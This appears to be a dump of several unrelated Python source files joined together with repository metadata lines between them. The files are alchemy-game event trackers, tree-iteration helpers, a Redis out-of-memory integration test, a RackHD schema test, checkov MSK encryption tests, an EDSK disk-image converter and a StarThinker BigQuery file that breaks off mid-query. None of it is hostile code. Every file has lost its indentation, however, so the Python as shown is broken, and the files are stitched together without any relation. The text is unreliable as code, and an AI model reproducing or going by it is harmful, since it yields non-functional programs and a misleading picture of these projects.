# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tracks the order of alchemy events and resulting stones and potions."""
import abc
import collections
import copy
import itertools
import random
from typing import Any, Dict, List, Mapping, Optional, Sequence, Set, Tuple, Union
from dm_alchemy.types import graphs
from dm_alchemy.types import stones_and_potions
from dm_alchemy.types import utils
import numpy as np
Stone = stones_and_potions.Stone
Potion = stones_and_potions.Potion
LatentStone = stones_and_potions.LatentStone
LatentPotion = stones_and_potions.LatentPotion
AlignedStone = stones_and_potions.AlignedStone
PerceivedPotion = stones_and_potions.PerceivedPotion
StoneMap = stones_and_potions.StoneMap
PotionMap = stones_and_potions.PotionMap
CAULDRON = stones_and_potions.CAULDRON
RewardWeights = stones_and_potions.RewardWeights
Graph = graphs.Graph
NEVER_USED = -1
NO_OUTCOME = -1
UNKNOWN_TYPE = -3
class EventTracker(abc.ABC):
"""Base class for things that track alchemy events."""
def __init__(self, name):
self.name = name
@abc.abstractmethod
def potion_used(
self, stone_ind: int, potion_ind: int, val: int, start_stone: graphs.Node,
stone_inst: int, potion: Potion, end_stone: graphs.Node) -> None:
pass
def failed_potion_use(
self, stone_ind: int, start_stone: graphs.Node, stone_inst: int) -> None:
"""Optional callback when a potion use is attempted but fails."""
pass
class GameState:
"""Keeps track of the symbolic state of an alchemy game."""
def __init__(
self, graph: graphs.Graph, trial_items: utils.TrialItems,
event_trackers: Optional[Sequence[EventTracker]] = None
):
self._stones = copy.deepcopy(trial_items.stones)
self._stone_idx_to_ind = {p.idx: i for i, p in enumerate(self._stones)}
self._stone_ind_to_idx = {i: p.idx for i, p in enumerate(self._stones)}
self._potions = copy.deepcopy(trial_items.potions)
self._potion_idx_to_ind = {p.idx: i for i, p in enumerate(self._potions)}
self._graph = graph
num_stones = len(self._stones)
num_potions = len(self._potions)
self._existing_stones = set(range(num_stones))
self._existing_potions = set(range(num_potions))
trackers = event_trackers if event_trackers is not None else []
self.trackers = {tracker.name: tracker for tracker in trackers}
self._count = 0
def add_event_trackers(self, event_trackers: Sequence[EventTracker]) -> None:
"""Adds event trackers if they are not already there."""
self.trackers.update({tracker.name: tracker for tracker in event_trackers})
def get_stone_ind(
self, stone_inst: Optional[int] = None,
stone: Optional[Union[graphs.Node, LatentStone]] = None
) -> Optional[int]:
"""Gets a stone referred to through a variety of methods.
The caller must pass exactly one of stone_inst and stone.
Args:
stone_inst: The instance id of the stone used in the potion.
stone: The stone used.
Returns:
The index (into the list of stones originally passed to the EventTracker
in construction) for the stone used in the potion or None if no match can
be found.
"""
if len([e for e in [stone_inst, stone] if e is not None]) != 1:
raise ValueError('Exactly one of stone inst and stone must be given.')
if stone_inst is not None:
return self._stone_idx_to_ind[stone_inst]
if isinstance(stone, LatentStone):
stone_node = graphs.Node(-1, stone.latent_coords)
else:
stone_node = stone
matches = self._matching_stones(stone_node)
if not matches:
return None
return matches[0]
def get_potion_ind(
self, potion_inst: Optional[int] = None,
potion: Optional[Union[Potion, LatentPotion]] = None) -> Optional[int]:
"""Gets a potion referred to through a variety of methods.
The caller must pass exactly one of potion_inst and potion.
Args:
potion_inst: The instance id of the potion used.
potion: The potion used.
Returns:
The index (into the list of potions originally passed to the EventTracker
in construction) for the potion used or None if no match can be found.
-1 refers to the cauldron.
"""
if len([e for e in [potion_inst, potion] if e is not None]) != 1:
raise ValueError('Exactly one of potion inst and potion must be given.')
if potion_inst is not None:
return self._potion_idx_to_ind[potion_inst]
if isinstance(potion, LatentPotion):
potion = Potion(-1, potion.latent_dim, potion.latent_dir)
matches = self._matching_potions(potion)
if not matches:
return None
return matches[0]
def _stone_node(self, ind: int) -> graphs.Node:
node_ = self._graph.node_list.get_node_by_coords(
list(self._stones[ind].latent))
assert node_ is not None
node: graphs.Node = node_
return node
def _matching_potions(self, potion: Potion) -> List[int]:
return [p for p in self._existing_potions
if self._potions[p].as_index == potion.as_index]
def _matching_stones(self, stone_node: graphs.Node) -> List[int]:
return [i for i in self._existing_stones
if tuple(self._stone_node(i).coords) == tuple(stone_node.coords)]
def has_stone_ind(self, stone_ind: int) -> bool:
return stone_ind in self._existing_stones
def has_potion_ind(self, potion_ind: int) -> bool:
return potion_ind in self._existing_potions
def _remove_potion(self, potion_ind: int) -> None:
self._existing_potions.remove(potion_ind)
def _remove_stone(self, stone_ind: int) -> None:
self._existing_stones.remove(stone_ind)
def potion_used(
self, stone_ind: int, potion_ind: int,
val: Optional[int] = None
) -> int:
"""Records that a potion has been used.
The caller must pass exactly one of stone_ind, stone_inst and stone, and
exactly one of potion_ind, potion_inst and potion.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
Returns:
The index (into the list of stones originally passed to the EventTracker
in construction) for the stone used in the potion. This may not have been
passed into the function (if stone_inst or stone was passed instead).
"""
# -1 corresponds to the cauldron and so there is no potion to remove and the
# stone does not change
old_node = self._stone_node(stone_ind)
outcome_stone = None
potion = None
if potion_ind != CAULDRON:
outcome_stone = copy.deepcopy(old_node)
potion = self._potions[potion_ind]
# Change the stone in _stones
if old_node in self._graph.edge_list.edges:
outcome_stone = [end_node for end_node, v in
self._graph.edge_list.edges[old_node].items()
if potion.same_effect(v[1])]
if outcome_stone:
assert len(outcome_stone) == 1
outcome_stone = outcome_stone[0]
self._stones[stone_ind].latent = np.array(list(outcome_stone.coords))
else:
outcome_stone = old_node
self._remove_potion(potion_ind)
if self.trackers:
if val is None:
val = self._count
self._count += 1
for event_tracker in self.trackers.values():
event_tracker.potion_used(
stone_ind, potion_ind, val, old_node,
self._stone_ind_to_idx[stone_ind], potion, outcome_stone)
return stone_ind
def stone_used(self, stone_ind: int, val: Optional[int] = None) -> None:
"""Records that a stone has been used (placed in the cauldron).
The caller must pass exactly one of stone_ind, stone_inst and stone.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
"""
self.potion_used(
stone_ind=stone_ind, potion_ind=CAULDRON, val=val)
self._remove_stone(stone_ind)
def failed_potion_use(self, stone_ind: int) -> None:
old_node = self._stone_node(stone_ind)
for event_tracker in self.trackers.values():
event_tracker.failed_potion_use(
stone_ind, old_node, self._stone_ind_to_idx[stone_ind])
def has_stones(self) -> bool:
return bool(self._existing_stones)
def has_potions(self) -> bool:
return bool(self._existing_potions)
def has_stones_and_potions(self) -> bool:
return self.has_stones() and self.has_potions()
def rand_stone_ind(self) -> int:
return random.sample(self._existing_stones, 1)[0]
def rand_potion_ind(self) -> int:
return random.sample(self._existing_potions, 1)[0]
def use_rand_stone_potion_pair(self) -> Tuple[Stone, int]:
"""Uses a random stone with a random potion.
Returns:
The new value of the stone and the index of that stone.
"""
stone_index = self.rand_stone_ind()
return self.use_rand_potion(stone_index)
def use_rand_potion(self, stone_ind: int) -> Tuple[Stone, int]:
"""Uses the stone passed with a random potion.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone to use in a random potion.
Returns:
The new value of the stone and the index of that stone.
"""
potion_index = self.rand_potion_ind()
self.potion_used(stone_ind, potion_index)
return self._stones[stone_ind], stone_ind
def existing_stone_nodes(self) -> List[graphs.Node]:
"""Returns a list of nodes for the remaining existing stones."""
return [self._stone_node(i) for i in self._existing_stones]
def existing_stones(self) -> List[Stone]:
"""Returns a list of the remaining existing stones."""
return [self._stones[i] for i in self._existing_stones]
def existing_potions(self) -> List[Potion]:
"""Returns a list of the remaining existing potions."""
return [self._potions[i] for i in self._existing_potions]
def existing_items(self) -> utils.TrialItems:
return utils.TrialItems(
stones=self.existing_stones(), potions=self.existing_potions())
@property
def num_stones(self) -> int:
return len(self._existing_stones)
@property
def num_potions(self) -> int:
return len(self._existing_potions)
def check_have_potions(self, needed_potions: Sequence[Potion]) -> bool:
"""Checks that we have all the potions we need."""
need = collections.Counter([p.as_index for p in needed_potions])
have = collections.Counter([self._potions[p].as_index
for p in self._existing_potions])
for k in need.keys():
if k not in have.keys():
return False
else:
if have[k] < need[k]:
return False
return True
def get_stones_above_thresh(
self, reward_weights: RewardWeights, threshold: int) -> List[int]:
"""Gets all the stones whose value exceeds the threshold passed in."""
current_vals = {i: reward_weights(self._stones[i].latent)
for i in self._existing_stones}
return [i for i, current_val in current_vals.items()
if current_val > threshold]
def use_stones_above_thresh(
self, reward_weights: RewardWeights, threshold: int) -> None:
"""Uses all the stones whose value exceeds the threshold passed in."""
for i in self.get_stones_above_thresh(reward_weights, threshold):
self.stone_used(i)
def get_stone(self, ind: int) -> Stone:
return self._stones[ind]
def get_potion(self, ind: int) -> Potion:
return self._potions[ind]
@property
def node_list(self) -> graphs.NodeList:
return self._graph.node_list
@property
def edge_list(self) -> graphs.EdgeList:
return self._graph.edge_list
@property
def stone_ind_to_idx(self) -> Dict[int, int]:
return self._stone_ind_to_idx
@property
def stone_idx_to_ind(self) -> Dict[int, int]:
return self._stone_idx_to_ind
@property
def potion_idx_to_ind(self) -> Dict[int, int]:
return self._potion_idx_to_ind
class TrialTracker(EventTracker):
"""Type which tracks all events in a trial."""
@abc.abstractmethod
def events_list(self) -> List[Tuple[int, int, int]]:
"""Returns a list of stone index, potion index, val for the trial events."""
pass
class MatrixEventTracker(TrialTracker):
"""Tracks the order of potion used and stone used events in matrix."""
def __init__(self, num_stones: int, num_potions: int):
self.events = np.full(
shape=(num_stones, num_potions + 1), fill_value=-1, dtype=np.int)
super().__init__(name='matrix_event')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Records that a potion has been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
self.events[stone_ind, potion_ind] = val
def events_list(self) -> List[Tuple[int, int, int]]:
stone_used, potion_used = np.where(self.events != -1)
frame = [self.events[x, y] for (x, y) in zip(stone_used, potion_used)]
num_potions = self.events.shape[1] - 1
events = sorted(zip(stone_used, potion_used, frame), key=lambda x: x[2])
return [
(stone_ind, CAULDRON if potion_ind == num_potions else potion_ind,
frame) for stone_ind, potion_ind, frame in events]
ActionSequenceElement = Tuple[int, Mapping[str, Any], int, int]
class ActionSequenceTracker(TrialTracker):
"""Tracks the order of potion used and stone used events in matrix."""
def __init__(self):
self._action_sequence = []
super().__init__(name='action_sequence')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Records that a potion has been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
# add to action sequence
action_dict = {'node': (start_stone.idx, start_stone.coords),
'stone_idx': stone_inst}
# -1 corresponds to the cauldron and so there is no potion to remove and the
# stone does not change
if potion_ind == CAULDRON:
action_dict['action'] = 'cauldron'
else:
# Change the stone in _stones
action_dict['action'] = (potion.as_index,
(potion.dimension, potion.direction))
action_dict['potion_idx'] = potion.idx
action_dict['outcome_node'] = (end_stone.idx, end_stone.coords)
self._action_sequence.append((val, action_dict, stone_ind, potion_ind))
@property
def action_sequence(self) -> List[Tuple[int, Dict[str, Any], int, int]]:
self._action_sequence.sort(key=lambda x: x[0])
return self._action_sequence
def events_list(self) -> List[Tuple[int, int, int]]:
return [(stone_ind, potion_ind, val)
for val, _, stone_ind, potion_ind in self.action_sequence]
class LatestOutcomeTracker(EventTracker):
"""Tracks the most recent outcome of using a potion."""
def __init__(
self, potion_map: PotionMap, stone_map: StoneMap, rotation: np.ndarray):
# -1 represents no change and is the default value for outcome.
self.outcome = None
self.type_based_action = None
self._potion_map, self._stone_map = potion_map, stone_map
self._rotation = rotation
super().__init__(name='latest_outcome')
def reset(self) -> None:
self.outcome = None
self.type_based_action = None
def _perceived_stone(self, stone: graphs.Node):
aligned_stone = self._stone_map.apply_inverse(LatentStone(np.array(
stone.coords)))
return stones_and_potions.unalign(aligned_stone, self._rotation)
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: Optional[graphs.Node]) -> None:
if end_stone is not None:
aligned_stone = self._stone_map.apply_inverse(LatentStone(np.array(
end_stone.coords)))
self.outcome = stones_and_potions.unalign(aligned_stone, self._rotation)
perceived_stone = self._perceived_stone(start_stone)
if potion_ind == CAULDRON:
self.type_based_action = utils.TypeBasedAction(
stone=perceived_stone, cauldron=True)
else:
perceived_potion = self._potion_map.apply_inverse(LatentPotion(
potion.dimension, potion.direction))
self.type_based_action = utils.TypeBasedAction(
stone=perceived_stone, potion=perceived_potion)
def failed_potion_use(
self, stone_ind: int, start_stone: graphs.Node, stone_inst: int):
"""Optional callback when a potion use is attempted but fails."""
self.outcome = None
perceived_stone = self._perceived_stone(start_stone)
# This is an invalid action but the stone type can be used for
# visualization.
self.type_based_action = utils.TypeBasedAction(stone=perceived_stone)
class RewardTracker(EventTracker):
"""Tracks the reward obtained."""
def __init__(self, reward_weights: RewardWeights):
self._reward = 0
self._reward_weights = reward_weights
super().__init__(name='reward')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Adds reward when a potion has been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). If this is not set then the value set will be
arbitrary but will preserve the order in which the potion_used and
stone_used functions are called.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
if potion_ind == CAULDRON:
self._reward += self._reward_weights(start_stone.coords)
@property
def reward(self) -> int:
return self._reward
class ItemsUsedTracker(EventTracker):
"""Tracks the stones and potions used."""
def __init__(self):
self.potions_used = []
self.stones_used = []
super().__init__(name='items_used')
def potion_used(
self, stone_ind: int, potion_ind: int, val: int,
start_stone: graphs.Node, stone_inst: int, potion: Potion,
end_stone: graphs.Node) -> None:
"""Keeps lists of potions and stones which have been used.
Args:
stone_ind: The index (into the list of stones originally passed to the
EventTracker in construction) for the stone used in the potion.
potion_ind: The index (into the list of potions originally passed to the
EventTracker in construction) for the potion used. -1 refers to the
cauldron.
val: The value to record in this event (typically the frame number that
this event occurs). This is not relevant for this tracker.
start_stone: The stone node before the potion is used.
stone_inst: The instance id for the stone we are using.
potion: The potion used.
end_stone: The stone node after the potion is used.
"""
if potion_ind == CAULDRON:
self.stones_used.append(stone_ind)
else:
self.potions_used.append(potion_ind)
@property
def num_potions_used(self) -> int:
return len(self.potions_used)
@property
def num_stones_used(self) -> int:
return len(self.stones_used)
class Event(abc.ABC):
"""Abstract base class for events we want to check in the event tracker."""
@abc.abstractmethod
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
pass
def occurs(self, events: np.ndarray) -> bool:
event_start, _, _ = self.next_occurrence(events)
not_occurred = event_start == NEVER_USED
return not not_occurred
class SingleEvent(Event):
"""A single event where a stone is used with one of a set of potions."""
def __init__(self, stone_ind: int, potion_inds: Set[int]):
self.stone_ind = stone_ind
self.potion_inds = potion_inds
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
"""Gets the next occurrence of this event.
Args:
events: numpy array of stones against potions with the last entry
corresponding to the cauldron with a -1 in places where that stone was
never used with that potion and the time of usage otherwise.
Returns:
When event starts, when event ends, which potions were used by event.
"""
frames_potions = [(events[self.stone_ind, p], p) for p in self.potion_inds
if events[self.stone_ind, p] >= 0]
if not frames_potions:
return NEVER_USED, NEVER_USED, None
frame, potion_used = min(frames_potions, key=lambda v: v[0])
return frame, frame, {potion_used}
class AnyOrderEvents(Event):
"""A set of events which can happen in any order."""
def __init__(self, set_events: Set[Event]):
self.set_events = set_events
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
"""Gets the next occurrence of this event.
Args:
events: numpy array of stones against potions with the last entry
corresponding to the cauldron with a -1 in places where that stone was
never used with that potion and the time of usage otherwise.
Returns:
When event starts, when event ends, which potions were used by event.
"""
results = [e.next_occurrence(events) for e in self.set_events]
if any(v[0] == NEVER_USED for v in results):
return NEVER_USED, NEVER_USED, None
return (min(v[0] for v in results), max(v[1] for v in results),
set(itertools.chain.from_iterable([v[2] for v in results])))
class OrderedEvents(Event):
"""A list of events which must happen in the order passed in."""
def __init__(self, iter_events: Sequence[Event]):
self.iter_events = iter_events
def next_occurrence(
self, events: np.ndarray) -> Tuple[int, int, Optional[Set[int]]]:
"""Gets the next occurrence of this event.
Args:
events: numpy array of stones against potions with the last entry
corresponding to the cauldron with a -1 in places where that stone was
never used with that potion and the time of usage otherwise.
Returns:
When event starts, when event ends, which potions were used by event.
"""
results = [e.next_occurrence(events) for e in self.iter_events]
if any(v[0] == NEVER_USED for v in results):
return NEVER_USED, NEVER_USED, None
for end_first, start_next in zip([v[1] for v in results[:-1]],
[v[0] for v in results[1:]]):
# If the events happen on the same step this is allowed.
if end_first > start_next:
return NEVER_USED, NEVER_USED, None
return (results[0][0], results[-1][1],
set(itertools.chain.from_iterable([v[2] for v in results])))
def replay_events(game_state: GameState, event_tracker: TrialTracker) -> None:
for stone_ind, potion_ind, val in event_tracker.events_list():
if potion_ind == CAULDRON:
game_state.stone_used(stone_ind=stone_ind, val=val)
else:
game_state.potion_used(
stone_ind=stone_ind, potion_ind=potion_ind, val=val)
def matrix_events_to_action_sequence(
graph: Graph, items: utils.TrialItems, matrix_events: MatrixEventTracker
) -> List[ActionSequenceElement]:
"""Takes events/output of evaluation analysis and creates an event tracker."""
action_sequence_tracker = ActionSequenceTracker()
game_state = GameState(
trial_items=items, graph=graph, event_trackers=[action_sequence_tracker])
if matrix_events.events.shape != (items.num_stones, items.num_potions + 1):
raise ValueError(
'Matrix of events shape does not match the number of stones and '
'potions present.')
replay_events(game_state, matrix_events)
return action_sequence_tracker.action_sequence
|
funcy/tree.py
|
ruancomelli/funcy
| 1,914 |
87964
|
from collections import deque
from .types import is_seqcont
__all__ = ['tree_leaves', 'ltree_leaves', 'tree_nodes', 'ltree_nodes']
def tree_leaves(root, follow=is_seqcont, children=iter):
"""Iterates over tree leaves."""
q = deque([[root]])
while q:
node_iter = iter(q.pop())
for sub in node_iter:
if follow(sub):
q.append(node_iter)
q.append(children(sub))
break
else:
yield sub
def ltree_leaves(root, follow=is_seqcont, children=iter):
"""Lists tree leaves."""
return list(tree_leaves(root, follow, children))
def tree_nodes(root, follow=is_seqcont, children=iter):
"""Iterates over all tree nodes."""
q = deque([[root]])
while q:
node_iter = iter(q.pop())
for sub in node_iter:
yield sub
if follow(sub):
q.append(node_iter)
q.append(children(sub))
break
def ltree_nodes(root, follow=is_seqcont, children=iter):
"""Lists all tree nodes."""
return list(tree_nodes(root, follow, children))
|
integration_test/test_denyoom.py
|
lynix94/nbase-arc
| 176 |
87979
|
<gh_stars>100-1000
#
# Copyright 2015 <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import testbase
import util
import redis_sock
import config
import default_cluster
# NOTE
# oom state persistence test is done by hand (hard to automate in this test framework)
#
class TestDenyOOM( unittest.TestCase ):
cluster = config.clusters[0]
leader_cm = config.clusters[0]['servers'][0]
@classmethod
def setUpClass(cls):
cls.conf_checker = default_cluster.initialize_starting_up_smr_before_redis( cls.cluster )
assert cls.conf_checker != None, 'failed to initialize cluster'
@classmethod
def tearDownClass( cls ):
testbase.defaultTearDown(cls)
def setUp( self ):
util.set_process_logfile_prefix( 'TestDenyOOM_%s' % self._testMethodName )
server = self.cluster['servers'][0]
self.redis = redis_sock.RedisClient(server['ip'], server['redis_port'])
def tearDown( self ):
if self.redis != None:
self.redis.close()
return 0
def check_oom(self, is_oom = False):
m,s1,s2 = util.get_mss(self.cluster)
mr = redis_sock.RedisClient(m['ip'], m['redis_port'])
sr = redis_sock.RedisClient(s1['ip'], s1['redis_port'])
try:
ok, data = mr.do_request("get nosuchkey_check_oom\r\n")
assert(ok), ok
ok, data = sr.do_request("get nosuchkey_check_oom\r\n")
assert(ok), ok
expected_ok = not is_oom
ok, data = mr.do_request("set nosuchkey_check_oom 100\r\n")
assert(ok == expected_ok), (ok, data)
ok, data = sr.do_request("set nosuchkey_check_oom 100\r\n")
assert(ok == expected_ok), (ok, data)
finally:
if mr != None:
mr.close()
if sr != None:
sr.close()
def test_basic ( self ):
util.print_frame()
redis = self.redis
# set oom
ok, resp = redis.do_request('deny-oom 1\r\n')
assert(resp == 'OK'), resp
self.check_oom(True)
# reset oom
ok, resp = redis.do_request('deny-oom 0\r\n')
assert(resp == 'OK'), resp
self.check_oom(False)
|
test/tests/rackhd20/test_rackhd20_api_schemas.py
|
arunrordell/RackHD
| 451 |
87980
|
'''
Copyright 2016, EMC, Inc.
Author(s):
<NAME>
'''
import fit_path # NOQA: unused import
import os
import sys
import subprocess
import fit_common
# Select test group here using @attr
from nose.plugins.attrib import attr
@attr(all=True, regression=True, smoke=True)
class rackhd20_api_schemas(fit_common.unittest.TestCase):
def test_api_20_schemas(self):
api_data = fit_common.rackhdapi("/api/2.0/schemas")
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for item in api_data['json']:
self.assertEqual(fit_common.rackhdapi(item)['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
if __name__ == '__main__':
fit_common.unittest.main()
|
tests/terraform/checks/resource/aws/test_MSKClusterEncryption.py
|
antonblr/checkov
| 4,013 |
87988
|
import unittest
from checkov.common.models.enums import CheckResult
from checkov.terraform.checks.resource.aws.MSKClusterEncryption import check
class TestMSKClusterEncryption(unittest.TestCase):
def test_failure(self):
resource_conf = {
"name": "test-project",
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure_non_tls(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": "aws_kms_key.kms.arn",
"encryption_in_transit": [
{
"client_broker": ["PLAINTEXT"],
"in_cluster": ["true"],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure_in_cluster(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": ["aws_kms_key.kms.arn"],
"encryption_in_transit": [
{
"client_broker": ["TLS"],
"in_cluster": [False],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": ["aws_kms_key.kms.arn"],
"encryption_in_transit": [
{
"client_broker": ["TLS"],
"in_cluster": ["true"],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_success_no_encrypt_block(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_at_rest_kms_key_arn": ["aws_kms_key.kms.arn"],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
# Regression test for https://github.com/bridgecrewio/checkov/issues/747
def test_success_no_encryption_at_rest_kms_key_arn_specified(self):
resource_conf = {
"name": "test-project",
"encryption_info": [{}],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
# Regression test for https://github.com/bridgecrewio/checkov/issues/747
def test_success_encryption_in_transit_and_no_encryption_at_rest_kms_key_arn_specified(self):
resource_conf = {
"name": "test-project",
"encryption_info": [
{
"encryption_in_transit": [
{
"client_broker": ["TLS"],
"in_cluster": [True],
}
],
}
],
}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
|
scripts/edsk_double_step.py
|
Bytedecode72/flashfloppy
| 847 |
88017
|
# edsk_double_step.py
#
# Create a double-step EDSK image by doubling up cylinders.
#
# Written & released by <NAME> <<EMAIL>>
#
# This is free and unencumbered software released into the public domain.
# See the file COPYING for more details, or visit <http://unlicense.org>.
import struct, sys, random
def main(argv):
if len(argv) != 3:
print("%s <input_file> <output_file>" % argv[0])
return
in_f = open(argv[1], "rb")
in_dat = in_f.read()
out = bytearray(in_dat[:256])
# Check image size
if len(in_dat) < 2048:
print("Not a valid EDSK image - Too short")
return
# Check image header
sig, _, tracks, sides, tsz = struct.unpack("<34s14sBBH", in_dat[:52])
out[48] = tracks * 2 # double up on number of cyls
tszs = in_dat[52:256]
in_dat = in_dat[256:]
if sig.startswith(b"MV - CPCEMU"):
for i in range(tracks):
out += in_dat[:tsz*sides]
for j in range(sides):
out[16-tsz*(j+1)] = i*2 # fix cyl#
out += in_dat[:tsz*sides]
for j in range(sides):
out[16-tsz*(j+1)] = i*2+1 # fix cyl#
in_dat = in_dat[tsz*sides:]
elif sig.startswith(b"EXTENDED CPC DSK File\r\nDisk-Info\r\n"):
for i in range(tracks):
for j in range(2):
off = 0
for k in range(sides):
tsz = tszs[k]*256
out += in_dat[off:off+tsz]
out[16-tsz] = i*2+j # fix cyl#
out[52+(i*2+j)*sides+k] = tszs[k] # fix track size
off += tsz
tszs = tszs[sides:]
in_dat = in_dat[off:]
else:
print("Not a valid EDSK image")
return
with open(argv[2], "wb") as f:
f.write(out)
if __name__ == "__main__":
main(sys.argv)
|
starthinker/task/cm_to_dv/preview_li.py
|
arbrown/starthinker
| 138 |
88019
|
<filename>starthinker/task/cm_to_dv/preview_li.py
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
from starthinker.util.bigquery import query_to_view
from starthinker.util.data import get_rows
from starthinker.util.data import put_rows
from starthinker.util.google_api import API_DV360
from starthinker.util.sheets import sheets_clear
from starthinker.task.cm_to_dv.log import log_write
def preview_li_clear(config, task):
sheets_clear(
task['auth_sheets'],
task['sheet'],
'LI Preview',
'A2:AJ'
)
def preview_li_load(config, task):
preview_li_clear(config, task)
# download LI Rules
put_rows(
task["auth_bigquery"],
{ "bigquery": {
"dataset": task["dataset"],
"table": "SHEET_LI_Rules",
"schema": [
{ "name": "CM_Campaign", "type": "STRING" },
{ "name": "DV_Campaign", "type": "STRING" },
{ "name": "Type", "type": "STRING" },
{ "name": "Budget_Allocation", "type": "STRING" },
{ "name": "Pacing_Type", "type": "STRING" },
{ "name": "Pacing_Period", "type": "STRING" },
{ "name": "Pacing_Period_Max_Spend", "type": "INTEGER" },
{ "name": "Pacing_Period_Max_Impressions", "type": "INTEGER" },
{ "name": "Frequency_Cap_Unlimited", "type": "BOOLEAN" },
{ "name": "Frequency_Cap_Time_Unit", "type": "STRING" },
{ "name": "Frequency_Cap_Time_Unit_Count", "type": "INTEGER" },
{ "name": "Frequency_Cap_Max_Impressions", "type": "INTEGER" },
{ "name": "Post_View_Count_Percent", "type": "INTEGER" },
{ "name": "Performance_Goal_Type", "type": "STRING" },
{ "name": "Performance_Goal_Amount", "type": "INTEGER" },
{ "name": "Max_Average_CPM_Amount", "type": "INTEGER" },
{ "name": "Custom_Bidding_Algorithm", "type": "STRING" },
],
"format": "CSV"
}},
get_rows(
task["auth_sheets"],
{ "sheets": {
"sheet": task["sheet"],
"tab": "LI Rules",
"header":False,
"range": "A2:AQ"
}}
)
)
# create LI preview ( main logic )
query_to_view(
task["auth_bigquery"],
config.project,
task["dataset"],
"PREVIEW_LI",
"""WITH
cm AS (
SELECT
CM_P.name,
CM_P.advertiserId,
CM_C.id AS campaignId,
CM_C.name AS campaignName,
CM_P.compatibility,
CM_PG.pricingSchedule.startDate AS budgetSegmentStartDate,
